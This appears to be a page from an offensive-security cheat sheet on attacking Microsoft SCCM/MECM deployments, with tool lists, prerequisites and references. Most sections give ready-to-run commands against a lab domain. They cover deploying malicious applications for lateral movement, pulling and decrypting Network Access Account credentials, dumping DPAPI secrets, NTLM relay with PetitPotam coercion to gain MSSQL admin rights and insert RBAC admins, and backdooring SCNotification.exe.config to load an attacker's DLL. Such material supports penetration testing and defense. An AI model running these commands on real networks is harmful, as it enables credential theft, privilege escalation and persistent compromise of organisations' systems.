Deployment - SCCM
SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
SCCM Application Deployment
Application Deployment is a process that involves packaging software applications and distributing them to selected computers or devices within an organization
Tools:
- PowerShellMafia/PowerSCCM - PowerShell module to interact with SCCM deployments
- nettitude/MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage
Exploitation:
- Using SharpSCCM
- Compromise client, use locate to find management server
- Enumerate over WMI as an administrator of the Distribution Point
- Compromise management server, use locate to find primary server
- Use
inspect
on primary server to view who you can target -
Create a new device group for the machines you want to laterally move too
-
Add your targets into the new group
-
Create an application pointing to a malicious EXE on a world readable share :
SCCMContentLib$
-
Deploy the application to the target group
-
Force the target group to checkin for updates
-
Cleanup the application, deployment and group
SCCM Shares
Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares
SCCM Configuration Manager
CRED-1 Retrieve credentials via PXE boot media
Requirements:
- On the SCCM Distribution Point:
HKLM\Software\Microsoft\SMS\DP\PxeInstalled
= 1 - On the SCCM Distribution Point:
HKLM\Software\Microsoft\SMS\DP\IsPxe
= 1 - PXE-enabled distribution point
Exploitation:
CRED-2 Request a policy containing credentials
Requirements:
- PKI certificates are not required for client authentication
- Domain accounts credential
Exploitation:
Create a machine or compromise an existing one, then request policies such as NAAConfig
Easy mode using SharpSCCM
```ps1
SharpSCCM get secrets -u <username-machine-$> -p <password>
SharpSCCM get naa
```
Stealthy mode by creating a computer.
- Create a machine account with a specific password:
addcomputer.py -computer-name 'customsccm$' -computer-pass 'YourStrongPassword123*' 'sccm.lab/carol:SCCMftw' -dc-ip 192.168.33.10
- In your
/etc/hosts
file, add an entry for the MECM server:192.168.33.11 MECM MECM.SCCM.LAB
- Use
sccmwtf
to request a policy:python3 sccmwtf.py fake fakepc.sccm.lab MECM 'SCCMLAB\customsccm$' 'YourStrongPassword123*'
- Parse the policy to extract the credentials and decrypt them using sccmwtf/policysecretunobfuscate.py:
cat /tmp/naapolicy.xml |grep 'NetworkAccessUsername\|NetworkAccessPassword' -A 5 |grep -e 'CDATA' | cut -d '[' -f 3|cut -d ']' -f 1| xargs -I {} python3 policysecretunobfuscate.py {}
CRED-3 Extract currently deployed credentials stored as DPAPI blobs
Dump currently deployed secrets via WMI. If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
Requirements:
- Local administrator privileges on an SCCM client
Exploitation:
-
Find SCCM blob
-
Using GhostPack/SharpDPAPI
-
Using Mayyhem/SharpSCCM for SCCM retrieval and decryption
From a remote machine.
CRED-4 Extract legacy credentials stored as DPAPI blobs
Requirements:
- Local administrator privileges on an SCCM client
Exploitation:
-
Search the database using
SharpDPAPI
-
Search the database using
SharpSCCM
-
Check ACL for the CIM repository located at
C:\Windows\System32\wbem\Repository\OBJECTS.DATA
:
CRED-5 Extract the SC_UserAccount table from the site database
Requirements:
- Site database access
- Primary site server access
- Access to the private key used for encryption
Exploitation:
- gentilkiwi/mimikatz
- skahwah/SQLRecon, only if the site server and database are hosted on the same system
- SQLRecon + xpn/sccmdecryptpoc.cs
SCCM Relay
TAKEOVER1 - Low Privileges to Database Administrator - MSSQL relay
Requirements:
- Database separated from the site server
- Server site is sysadmin of the database
Exploitation:
- Generate the query to elevate our user:
python3 sccmhunter.py mssql -u carol -p SCCMftw -d sccm.lab -dc-ip 192.168.33.10 -debug -tu carol -sc P01 -stacked
- Setup a relay with the generated query:
ntlmrelayx.py -smb2support -ts -t mssql://192.168.33.12 -q "USE CM_P01; INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) VALUES (0x01050000000000051500000058ED3FD3BF25B04EDE28E7B85A040000,'SCCMLAB\carol',0,0,'','','','','P01');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00ALL','29');INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00001','1'); INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'SCCMLAB\carol'),'SMS0001R','SMS00004','1');"
- Coerce an authentication to your listener using a domain account:
petitpotam.py -d sccm.lab -u carol -p SCCMftw 192.168.33.1 192.168.33.11
- Finally, connect as admin on the MSSQL server:
python3 sccmhunter.py admin -u carol@sccm.lab -p 'SCCMftw' -ip 192.168.33.11
TAKEOVER2 - Low Privileges to MECM Admin Account - SMB relay
Microsoft requires the site server's computer account to be an administrator on the MSSQL server.
Exploitation:
- Start a listener for the MSSQL Server:
ntlmrelayx -t 192.168.33.12 -smb2support -socks
- Coerce an authentication from the Site Server using domain credentials (low privileges SCCM NAA retrieved on the same machine works great):
petitpotam.py -d sccm.lab -u sccm-naa -p 123456789 192.168.33.1 192.168.33.11
- Finally use the SOCKS from
ntlmrelayx
to access the MSSQL server as a local administrator
SCCM Persistence
- mandiant/CcmPwn - lateral movement script that leverages the CcmExec service to remotely hijack user sessions.
CcmExec is a service native to SCCM Windows clients that is executed on every interactive session. This technique requires Adminsitrator privileges on the targeted machine.
-
Backdoor the
SCNotification.exe.config
to load your DLL -
Malicious config to force
SCNotification.exe
to load a file from an attacker-controlled file share
References
- Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015
- The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28
- Introducing MalSCCM - Phil Keeble -May 4, 2022
- Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022
- Exploring SCCM by Unobfuscating Network Access Accounts - @xpn - Posted on 2022-07-09
- Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022
- Misconfiguration Manager: Overlooked and Overprivileged - Duane Michael - Mar 5, 2024
- SeeSeeYouExec: Windows Session Hijacking via CcmExec - Andrew Oliveau
- SCCM / MECM LAB - Part 0x0 - mayfly - Mar 23, 2024
- SCCM / MECM LAB - Part 0x1 - Recon and PXE - mayfly - Mar 28, 2024
- SCCM / MECM LAB - Part 0x2 - Low user - mayfly - Mar 28, 2024
- SCCM / MECM LAB - Part 0x3 - Admin User - mayfly - Apr 3, 2024